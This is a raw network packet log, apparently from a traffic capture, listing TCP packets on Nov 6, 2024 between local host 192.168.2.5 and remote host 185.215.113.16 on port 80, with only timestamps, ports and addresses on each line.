                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134154081 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134196043 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134279966 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134290934 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134296894 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134331942 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134376049 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134390116 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134404898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134417057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134428024 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134434938 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134449959 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134459019 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134466887 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134479046 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134495974 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134505033 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134510994 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134519100 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134526014 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134537935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134550095 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.134577990 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135075092 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135086060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135097027 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135117054 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135122061 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135143995 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135154963 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135211945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135226965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135240078 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135248899 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135291100 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135310888 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135332108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135344028 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135355949 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135361910 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135376930 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135390997 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135395050 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135401964 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135412931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135421038 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135425091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135436058 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135442972 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135452986 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135464907 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135473967 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135477066 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135493040 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135499954 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135509968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135521889 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135534048 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135534048 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135546923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135557890 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135557890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135569096 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135586023 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135588884 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135598898 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135603905 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135612965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135624886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135639906 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135638952 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135653973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135656118 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135668039 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135682106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135684013 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135701895 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135715008 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135715961 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135727882 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135740042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135749102 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135751009 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135767937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135771036 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135782003 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135798931 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135803938 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135811090 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135823965 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135835886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135845900 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135848999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135865927 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135873079 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135896921 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135911942 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135922909 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135929108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135941029 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135947943 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135953903 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135965109 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135970116 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135979891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.135997057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136001110 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136008978 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136022091 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136024952 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136034012 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136046886 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136054993 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136059999 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136068106 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136073112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136085033 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136094093 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136096001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136107922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136116028 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136121988 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136143923 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136317015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136327982 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136343002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136353970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136363983 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136374950 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136476994 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136492968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136503935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136516094 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136517048 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136529922 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136533976 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136543036 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136554956 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136560917 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136567116 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136576891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136588097 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136590958 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136599064 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136605978 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136611938 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136632919 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136635065 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136647940 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136657953 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136662006 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136671066 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136682034 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136693001 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136696100 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136706114 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136709929 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136718035 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136729002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136734962 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136743069 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136755943 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136778116 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136779070 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136791945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136801958 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136806011 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136817932 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136825085 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136828899 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136841059 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136854887 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136856079 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136874914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136888981 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136895895 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136900902 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136905909 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136914968 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136934042 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136945963 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136951923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136962891 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136972904 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136980057 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.136991978 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137001991 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137002945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137016058 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137023926 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137027979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137041092 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137044907 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137056112 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137065887 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137073994 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137082100 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137099028 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137099981 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137113094 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137123108 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137131929 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137140989 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137155056 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137160063 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137170076 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137181997 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137197018 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137201071 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137221098 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137223959 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137233973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137250900 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137262106 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137259960 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137279034 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137290001 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137303114 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137314081 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137326002 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137337923 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137347937 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137358904 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137358904 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137371063 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137378931 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137382030 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137394905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137402058 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137413979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137429953 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137438059 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137444973 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137459040 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137460947 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137474060 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137486935 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137496948 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137511015 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137510061 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137523890 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137535095 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137540102 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137547970 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137552023 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137562037 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137573957 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137579918 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137587070 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137599945 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137607098 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137613058 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137624979 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137634993 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137636900 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137646914 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137658119 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137660980 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137666941 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137671947 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137684107 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137692928 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137703896 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137717009 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137723923 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137729883 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137742996 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137752056 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137756109 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137768984 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137774944 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137780905 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137792110 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137803078 CET8049719185.215.113.16192.168.2.5
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137819052 CET4971980192.168.2.5185.215.113.16
                                                                                                                                                                                                                            Nov 6, 2024 14:39:19.137824059 CET8049719185.215.113.16192.168.2.5
